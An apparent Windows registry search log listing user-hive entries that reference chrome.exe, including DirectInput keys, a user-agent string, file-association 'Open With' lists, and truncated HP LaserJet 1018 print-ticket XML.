"Name"="CHROME.EXE"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\CHROME.EXE524CDEDB000CE3D0]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\CHROME.EXE524CDEDB000CE3D0]
"Name"="CHROME.EXE"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\MostRecentApplication]
"Name"="CHROME.EXE"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\MostRecentApplication]
"Id"="CHROME.EXE524CDEDB000CE3D0"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\IEDevTools\Options\UAString]
"Chrome"="Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithList]
"b"="chrome.exe"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithList]
"b"="chrome.exe"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList]
"a"="chrome.exe"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpg\OpenWithList]
"c"="chrome.exe"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList]
"b"="chrome.exe"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\PhotoPrintingWizard\HP LaserJet 1018]
"PrintTicket"="<?xml version="1.0"?>
<psf:PrintTicket xmlns:psf="http://schemas.microsoft.com/windows/2003/08/printing/printschemaframework" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" version="1" xmlns:ns0000="http://schemas.microsoft.com/windows/printing/oemdriverpt/HP_LaserJet 1018/2012.918.1.57980/" xmlns:psk="http://schemas.microsoft.com/windows/2003/08/printing/printschemakeywords"><psf:ParameterInit name="ns0000:PageDevmodeSnapshot"><psf:Value xsi:type="xsd:string">SABQACAATABhAHMAZQByAEoAZQB0ACAAMQAwADEAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEEAwDcADQDA58AAAIAAQAAAAAAAAABAAcAWAIBAAEAWAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFNERE0ABgAAAAYAAEhQIExhc2VySmV0IDEwMTgAAAAAAAAAAAA
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\PhotoPrintingWizard\HP LaserJet 1018]
"PrintCapabilites"="<?xml version="1.0"?>
<psf:PrintCapabilities xmlns:psf="http://schemas.microsoft.com/windows/2003/08/printing/printschemaframework" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" version="1" xmlns:ns0000="http://schemas.microsoft.com/windows/printing/oemdriverpt/HP_LaserJet 1018/2012.918.1.57980/" xmlns:psk="http://schemas.microsoft.com/windows/2003/08/printing/printschemakeywords"><psf:ParameterDef name="ns0000:PageDevmodeSnapshot"><psf:Property name="psf:DataType"><psf:Value xsi:type="xsd:QName">xsd:string</psf:Value></psf:Property><psf:Property name="psf:UnitType"><psf:Value xsi:type="xsd:string">base64</psf:Value></psf:Property><psf:Property name="psf:DefaultValue"><psf:Value xsi:type="xsd:string">SABQACAATABhAHMAZQByAEoAZQB0ACAAMQAwADEAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEEAwDc

-= EOF =-

 

Click Here